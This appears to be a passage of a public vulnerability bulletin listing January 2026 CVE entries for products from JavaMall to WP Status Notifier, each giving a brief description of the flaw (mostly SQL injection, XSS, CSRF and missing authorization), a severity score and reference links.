| cld378632668--JavaMall | A vulnerability was found in cld378632668 JavaMall up to 994f1e2b019378ec9444cdf3fce2d5b5f72d28f0. This impacts the function Upload of the file src/main/java/com/macro/mall/controller/MinioController.java. The manipulation results in unrestricted upload. It is possible to launch the attack remotely. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 6.3 | CVE-2025-15448 | VDB-339481 | cld378632668 JavaMall MinioController.java upload unrestricted upload VDB-339481 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721997 | https://github.com/cld378632668/JavaMall JavaMall 1.0 Upload any file https://github.com/zyhzheng500-maker/cve/blob/main/javamall%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| cld378632668--JavaMall | A vulnerability was determined in cld378632668 JavaMall up to 994f1e2b019378ec9444cdf3fce2d5b5f72d28f0. Affected is the function delete of the file src/main/java/com/macro/mall/controller/MinioController.java. This manipulation of the argument objectName causes path traversal. The attack can be initiated remotely. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 5.4 | CVE-2025-15449 | VDB-339482 | cld378632668 JavaMall MinioController.java delete path traversal VDB-339482 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722000 | https://github.com/cld378632668/JavaMall JavaMall 1.0 Delete any file https://github.com/zyhzheng500-maker/cve/blob/main/JavaMall%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%A0%E9%99%A4.md |
| clevelandwebdeveloper--Smart App Banners | The Smart App Banners plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'size' and 'verticalalign' parameters of the 'app-store-download' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13841 | https://www.wordfence.com/threat-intel/vulnerabilities/id/add85b9b-3a4d-4c46-a90f-10c9645e249d?source=cve https://plugins.trac.wordpress.org/browser/smart-app-banners/trunk/index.php#L321 https://plugins.trac.wordpress.org/browser/smart-app-banners/tags/1.2/index.php#L321 |
| code-projects--Intern Membership Management System | A flaw has been found in code-projects Intern Membership Management System 1.0. The impacted element is an unknown function of the file /intern/admin/edit_admin.php. This manipulation of the argument admin_id causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2026-01-08 | 4.7 | CVE-2026-0697 | VDB-339974 | code-projects Intern Membership Management System edit_admin.php sql injection VDB-339974 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #732998 | code-projects Intern Membership Management System 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20admin.php%20sql%20injection1.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability has been found in code-projects Intern Membership Management System 1.0. This affects an unknown function of the file /intern/admin/edit_students.php. Such manipulation of the argument admin_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-01-08 | 4.7 | CVE-2026-0698 | VDB-339975 | code-projects Intern Membership Management System edit_students.php sql injection VDB-339975 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #732999 | code-projects Intern Membership Management System 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20students_details.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability was found in code-projects Intern Membership Management System 1.0. This impacts an unknown function of the file /intern/admin/edit_activity.php. Performing a manipulation of the argument activity_id results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2026-01-08 | 4.7 | CVE-2026-0699 | VDB-339976 | code-projects Intern Membership Management System edit_activity.php sql injection VDB-339976 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733000 | code-projects Intern Membership Management System activity.php 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20activity.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability was identified in code-projects Intern Membership Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /intern/admin/add_admin.php. The manipulation of the argument Username leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2026-01-08 | 4.7 | CVE-2026-0701 | VDB-339978 | code-projects Intern Membership Management System add_admin.php sql injection VDB-339978 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733002 | code-projects Intern Membership Management System add_admin.php v1.0 sql injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20add_admin.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A security vulnerability has been detected in code-projects Intern Membership Management System 1.0. This issue affects some unknown processing of the file /intern/admin/delete_admin.php. Such manipulation of the argument admin_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-01-08 | 4.7 | CVE-2026-0728 | VDB-340125 | code-projects Intern Membership Management System delete_admin.php sql injection VDB-340125 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733003 | code-projects Intern Membership Management System delete_admin.php v1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20delete_admin.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability was detected in code-projects Intern Membership Management System 1.0. Impacted is an unknown function of the file /intern/admin/add_activity.php. Performing a manipulation of the argument Title results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-01-08 | 4.7 | CVE-2026-0729 | VDB-340126 | code-projects Intern Membership Management System add_activity.php sql injection VDB-340126 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733004 | code-projects Intern Membership Management System add_activity.php v1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20add_activity.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Intern Membership Management System | A vulnerability was determined in code-projects Intern Membership Management System 1.0. Impacted is an unknown function of the file /admin/delete_activity.php. Executing a manipulation of the argument activity_id can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-11 | 4.7 | CVE-2026-0850 | VDB-340445 | code-projects Intern Membership Management System delete_activity.php sql injection VDB-340445 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733486 | code-projects Intern Membership Management System delete_activity.php v1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20delete_activity.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Online Product Reservation System | A weakness has been identified in code-projects Online Product Reservation System 1.0. This issue affects some unknown processing of the file app/products/left_cart.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-01-05 | 6.3 | CVE-2026-0584 | VDB-339476 | code-projects Online Product Reservation System left_cart.php sql injection VDB-339476 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731095 | code-projects Online Product Reservation system in PHP with source code V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_left_cart.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_left_cart.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was determined in code-projects Online Product Reservation System 1.0. The affected element is an unknown function of the file /app/checkout/delete.php of the component POST Parameter Handler. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-05 | 6.3 | CVE-2026-0590 | VDB-339500 | code-projects Online Product Reservation System POST Parameter delete.php sql injection VDB-339500 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731128 | code-projects Online Product Reservation System V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_checkout_delete.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_checkout_delete.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was identified in code-projects Online Product Reservation System 1.0. The impacted element is an unknown function of the file /app/checkout/update.php of the component Cart Update Handler. Such manipulation of the argument id/qty leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-01-05 | 6.3 | CVE-2026-0591 | VDB-339501 | code-projects Online Product Reservation System Cart Update update.php sql injection VDB-339501 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731129 | code-projects Online Product Reservation System V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_checkout_update.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_checkout_update.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was detected in code-projects Online Product Reservation System 1.0. The affected element is an unknown function of the file handgunner-administrator/prod.php. Performing a manipulation of the argument cat results in cross site scripting. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-01-05 | 4.3 | CVE-2026-0586 | VDB-339478 | code-projects Online Product Reservation System prod.php cross site scripting VDB-339478 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731098 | code-projects Online Product Reservation system in PHP with source code V1.0 Improper Neutralization of Alternate XSS Syntax https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/xss_prod.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/xss_prod.php.md#poc https://code-projects.org/ |
| codeclouds--Unify | The Unify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'init' action in all versions up to, and including, 3.4.9. This makes it possible for unauthenticated attackers to delete specific plugin options via the 'unify_plugin_downgrade' parameter. | 2026-01-07 | 5.3 | CVE-2025-13529 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b5fd4a47-0549-4d03-b81a-ad97d3d5d390?source=cve https://plugins.trac.wordpress.org/browser/unify/trunk/Services/Hooks.php#L154 https://plugins.trac.wordpress.org/browser/unify/tags/3.4.9/Services/Hooks.php#L154 |
| Columbia Weather Systems--MicroServer | MicroServer copies parts of the system firmware to an unencrypted external SD card on boot, which contains user and vendor secrets. An attacker can utilize these plaintext secrets to modify the vendor firmware, or gain admin access to the web portal. | 2026-01-07 | 6.5 | CVE-2025-64305 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json |
| coreshop--CoreShop | CoreShop is a Pimcore enhanced eCommerce solution. Prior to version 4.1.8, a blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques. The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible. This issue has been patched in version 4.1.8. | 2026-01-08 | 4.9 | CVE-2026-22242 | https://github.com/coreshop/CoreShop/security/advisories/GHSA-ch7p-mpv4-4vg4 https://github.com/coreshop/CoreShop/commit/59e84fec59d113952b6d28a9b30c6317f9e6e5dd |
| corsonr--Easy GitHub Gist Shortcodes | The Easy GitHub Gist Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the gist shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14147 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b117d77b-2c11-451c-b236-b55e8af68a9a?source=cve https://plugins.trac.wordpress.org/browser/easy-github-gist-shortcodes/trunk/easy-github-gist-shortcodes.php#L24 https://plugins.trac.wordpress.org/browser/easy-github-gist-shortcodes/tags/1.0/easy-github-gist-shortcodes.php#L24 |
| creativemotion--Clearfy Cache WordPress optimization plugin, Minify HTML, CSS & JS, Defer | The Clearfy Cache - WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.0. This is due to missing nonce validation on the "wbcr_upm_change_flag" function. This makes it possible for unauthenticated attackers to disable plugin/theme update notifications via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-09 | 4.3 | CVE-2025-13749 | https://www.wordfence.com/threat-intel/vulnerabilities/id/55750dcf-c6ec-4be6-967f-60bf940fa30e?source=cve https://research.cleantalk.org/cve-2025-13749/ https://plugins.trac.wordpress.org/changeset/3421009/clearfy |
| Crocoblock--JetEngine | Missing Authorization vulnerability in Crocoblock JetEngine allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetEngine: from n/a through 3.8.1.1. | 2026-01-07 | 4.3 | CVE-2025-69333 | https://patchstack.com/database/wordpress/plugin/jet-engine/vulnerability/wordpress-jetengine-plugin-3-8-1-1-broken-access-control-vulnerability?_s_id=cve |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.9.5 via the hash() function due to use of a hardcoded fall-back salt. This makes it possible for unauthenticated attackers to generate a valid token across sites running the plugin that have not manually set a salt in the wp-config.php file and access booking information that will allow them to make modifications. | 2026-01-06 | 6.5 | CVE-2025-11723 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a5f3fbd2-6152-4a89-8fe9-982120d1a640?source=cve https://plugins.trac.wordpress.org/changeset/3393919/ |
| ctietze--PullQuote | The PullQuote plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pullquote' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13903 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0a0ee752-7fc4-46d3-9e0f-8b9317b0ea72?source=cve https://plugins.trac.wordpress.org/browser/pullquote/trunk/includes/core.php#L12 https://plugins.trac.wordpress.org/browser/pullquote/tags/1.0/includes/core.php#L12 |
| cuvixsystem--Post Like Dislike | The Post Like Dislike plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14130 | https://www.wordfence.com/threat-intel/vulnerabilities/id/598529d2-16c7-4bbd-9321-aa338c94eb36?source=cve https://plugins.trac.wordpress.org/browser/post-like-dislike/trunk/post-like-dislike.php#L106 https://plugins.trac.wordpress.org/browser/post-like-dislike/tags/1.0/post-like-dislike.php#L106 |
| cyberlord92--miniOrange OTP Verification and SMS Notification for WooCommerce | The miniOrange OTP Verification and SMS Notification for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `enable_wc_sms_notification` AJAX action in all versions up to, and including, 4.3.8. This makes it possible for unauthenticated attackers to enable or disable SMS notification settings for WooCommerce orders. | 2026-01-10 | 5.3 | CVE-2025-14948 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f84ddc83-2079-45b9-8354-51094581b1f8?source=cve https://plugins.trac.wordpress.org/browser/miniorange-sms-order-notification-otp-verification/tags/4.3.8/notifications/wcsmsnotification/handler/class-woocommercenotifications.php#L138 https://plugins.trac.wordpress.org/browser/miniorange-sms-order-notification-otp-verification?rev=3423647 |
| D-Link--DI-8200G | A vulnerability was found in D-Link DI-8200G 17.12.20A1. This affects an unknown function of the file /upgrade_filter.asp. The manipulation of the argument path results in command injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-01-08 | 6.3 | CVE-2026-0732 | VDB-340129 | D-Link DI-8200G upgrade_filter.asp command injection VDB-340129 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733275 | D-Link DI_8200G Router V17.12.20A1 Command Execution https://github.com/DavCloudz/cve/blob/main/D-link/DI_8200G/DI_8200G%20V17.12.20A1%20Command%20Execution%20Vulnerability/readme.md https://github.com/DavCloudz/cve/blob/main/D-link/DI_8200G/DI_8200G%20V17.12.20A1%20Command%20Execution%20Vulnerability/readme.md#poc https://www.dlink.com/ |
| damienoh--WP Widget Changer | The WP Widget Changer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14131 | https://www.wordfence.com/threat-intel/vulnerabilities/id/699392b4-8270-47b5-90c1-5280d1389586?source=cve https://wordpress.org/plugins/wp-widget-changer/ https://plugins.trac.wordpress.org/browser/wp-widget-changer/trunk/widget_changer.php#L162 https://plugins.trac.wordpress.org/browser/wp-widget-changer/tags/1.2.5/widget_changer.php#L162 |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control when querying agent permissions. An authenticated attacker can read the permissions of arbitrary agents, even if they have no permissions for this agent. LibreChat allows the configuration of agents that have a predefined set of instructions and context. Private agents are not visible to other users. However, if an attacker knows the agent ID, they can read the permissions of the agent including the permissions individually assigned to other users. This issue is fixed in version 0.8.2-rc2. | 2026-01-07 | 4.3 | CVE-2025-69221 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-5ccx-4r3h-9qc7 https://github.com/danny-avila/LibreChat/commit/06ba025bd95574c815ac6968454be7d3b024391c https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2 |
| davidangel--PhotoFade | The PhotoFade plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'time' parameter in all versions up to, and including, 0.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13847 | https://www.wordfence.com/threat-intel/vulnerabilities/id/00145a6b-26fd-4cba-a446-8236438075d8?source=cve https://plugins.trac.wordpress.org/browser/photofade/trunk/photo-fade.php#L96 https://plugins.trac.wordpress.org/browser/photofade/tags/0.2.1/photo-fade.php#L96 |
| debtcom--Debt.com Business in a Box | The Debt.com Business in a Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'configuration' parameter of the lead_form shortcode in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13852 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1bb58556-29be-4272-85fc-bb2b7c72abf4?source=cve https://plugins.trac.wordpress.org/browser/debtcom-business-in-a-box/trunk/inc/bib_form.php#L256 https://plugins.trac.wordpress.org/browser/debtcom-business-in-a-box/tags/4.1.0/inc/bib_form.php#L256 |
| Dell--PowerProtect Data Domain with Data Domain Operating System (DD OS) Feature Release | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS2023 release versions 7.10.1.0 through 7.10.1.70, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Command execution. | 2026-01-09 | 6 | CVE-2025-46644 | https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain with Data Domain Operating System (DD OS) Feature Release | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS 2023 release versions 7.10.1.0 through 7.10.1.70, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution. | 2026-01-09 | 6.5 | CVE-2025-46645 | https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--Secure Connect Gateway (SCG) Appliance | Dell Secure Connect Gateway (SCG) 5.0 Appliance and Application, version(s) versions 5.26 to 5.30, contain(s) an Execution with Unnecessary Privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges. | 2026-01-06 | 6.4 | CVE-2025-46696 | https://www.dell.com/support/kbdoc/en-us/000385230/dsa-2025-390-dell-secure-connect-gateway-security-update-for-multiple-vulnerabilities |
| directus--directus | Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.14.0, an open redirect vulnerability exists in the Directus SAML authentication callback endpoint. During SAML authentication, the `RelayState` parameter is intended to preserve the user's original destination. However, while the login initiation flow validates redirect targets against allowed domains, this validation is not applied to the callback endpoint. This allows an attacker to craft a malicious authentication request that redirects users to an arbitrary external URL upon completion. The vulnerability is present in both the success and error handling paths of the callback. This vulnerability can be exploited without authentication. Version 11.14.0 contains a patch. | 2026-01-08 | 4.3 | CVE-2026-22032 | https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23 |
| djrowling--Niche Hero | Beautifully-designed blocks in seconds | The Niche Hero | Beautifully-designed blocks in seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'spacing' parameter of the nh_row shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14145 | https://www.wordfence.com/threat-intel/vulnerabilities/id/52368b7d-5fe2-444c-bd7f-e4385dffa8a9?source=cve https://plugins.trac.wordpress.org/browser/niche-hero/trunk/niche-hero.php#L302 https://plugins.trac.wordpress.org/browser/niche-hero/tags/1.0.5/niche-hero.php#L302 |
| Dokan--Dokan Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dokan Dokan Pro allows Stored XSS.This issue affects Dokan Pro: from n/a through 3.14.5. | 2026-01-05 | 6.5 | CVE-2025-39497 | https://vdp.patchstack.com/database/wordpress/plugin/dokan-pro/vulnerability/wordpress-dokan-pro-plugin-3-14-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| enartia--Piraeus Bank WooCommerce Payment Gateway | The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized order status modification in all versions up to, and including, 3.1.4. This is due to missing authorization checks on the payment callback endpoint handler when processing the 'fail' callback from the payment gateway. This makes it possible for unauthenticated attackers to change any order's status to 'failed' via the publicly accessible WooCommerce API endpoint by providing only the order ID (MerchantReference parameter), which can be easily enumerated as order IDs are sequential integers. This can cause significant business disruption including canceled shipments, inventory issues, and loss of revenue. | 2026-01-07 | 5.3 | CVE-2025-14460 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d7b15198-8f44-4390-862b-35d41eb8a854?source=cve https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/trunk/classes/WC_Piraeusbank_Gateway.php#L821 https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/tags/3.1.4/classes/WC_Piraeusbank_Gateway.php#L821 |
| EngoTheme--Plant - Gardening & Houseplants WordPress Theme | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in EngoTheme Plant - Gardening & Houseplants WordPress Theme allows Retrieve Embedded Sensitive Data.This issue affects Plant - Gardening & Houseplants WordPress Theme: from n/a through 1.0.0. | 2026-01-06 | 5.3 | CVE-2025-31051 | https://patchstack.com/database/wordpress/theme/plant/vulnerability/wordpress-plant-gardening-houseplants-wordpress-theme-1-0-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| expresstech--Quiz and Survey Master (QSM) Easy Quiz and Survey Maker | The Quiz and Survey Master (QSM) - Easy Quiz and Survey Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'is_linking' parameter in all versions up to, and including, 10.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-06 | 6.5 | CVE-2025-9318 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e6524e66-5bd1-4616-8185-c0501a09893e?source=cve https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/rest-api.php#L533 |
| expresstech--Quiz and Survey Master (QSM) Easy Quiz and Survey Maker | The Quiz and Survey Master (QSM) - Easy Quiz and Survey Maker plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability and status checks on multiple functions in all versions up to, and including, 10.3.1. This makes it possible for unauthenticated attackers to view the details of unpublished, private, or password-protected quizzes, as well as submit file responses to questions from those quizzes, which allow file upload. | 2026-01-06 | 6.5 | CVE-2025-9637 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88a9abf4-62a9-4695-87e7-18ff0b0075e9?source=cve https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/classes/class-qmn-quiz-manager.php#L281 https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/classes/class-qmn-quiz-manager.php#L1987 https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/rest-api.php |
| expresstech--Quiz and Survey Master (QSM) Easy Quiz and Survey Maker | The Quiz and Survey Master (QSM) - Easy Quiz and Survey Maker plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the qsm_dashboard_delete_result function in all versions up to, and including, 10.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete quiz results. | 2026-01-06 | 4.3 | CVE-2025-9294 | https://www.wordfence.com/threat-intel/vulnerabilities/id/55895508-d0ef-4855-8d15-b8a45ba0dcb2?source=cve https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.2.6/php/admin/options-page-questions-tab.php#L1116 |
| FLIR Systems, Inc.--FLIR Thermal Camera F/FC/PT/D | FLIR Thermal Camera F/FC/PT/D firmware version 8.0.0.64 contains an information disclosure vulnerability that allows unauthenticated attackers to read arbitrary files through unverified input parameters. Attackers can exploit the /var/www/data/controllers/api/xml.php readFile() function to access local system files without authentication. | 2026-01-07 | 6.2 | CVE-2017-20212 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42786 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| Flycatcher Toys--smART Sketcher | A flaw has been found in Flycatcher Toys smART Sketcher up to 2.0. This affects an unknown part of the component Bluetooth Low Energy Interface. This manipulation causes missing authentication. The attack can only be done within the local network. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 6.3 | CVE-2026-0842 | VDB-340442 | Flycatcher Toys smART Sketcher Bluetooth Low Energy missing authentication VDB-340442 | CTI Indicators (IOB, IOC) Submit #729134 | Flycatcher Toys smART Sketcher 2.0 0/1/2 Missing Authentication for Critical Function https://github.com/davidrxchester/smart-sketcher-upload/blob/main/smartsketch-upload.py |
| fpcorso--Testimonial Master | The Testimonial Master plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 0.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14127 | https://www.wordfence.com/threat-intel/vulnerabilities/id/15e65a86-db8e-4a4a-b9c6-c688021a514f?source=cve https://wordpress.org/plugins/testimonial-master/ https://plugins.trac.wordpress.org/browser/testimonial-master/trunk/php/tm_help_page.php#L190 https://plugins.trac.wordpress.org/browser/testimonial-master/tags/0.2.1/php/tm_help_page.php#L190 |
| fulippo--WP Status Notifier | The WP Status Notifier plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13521 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fbffc404-9ea9-4025-8241-2c374b760ca3?source=cve https://plugins.trac.wordpress.org/browser/wp-change-status-notifier/trunk/options-page.php#L2 https://plugins.trac.wordpress.org/browser/wp-change-status-notifier/tags/1.0/options-page.php#L2 |
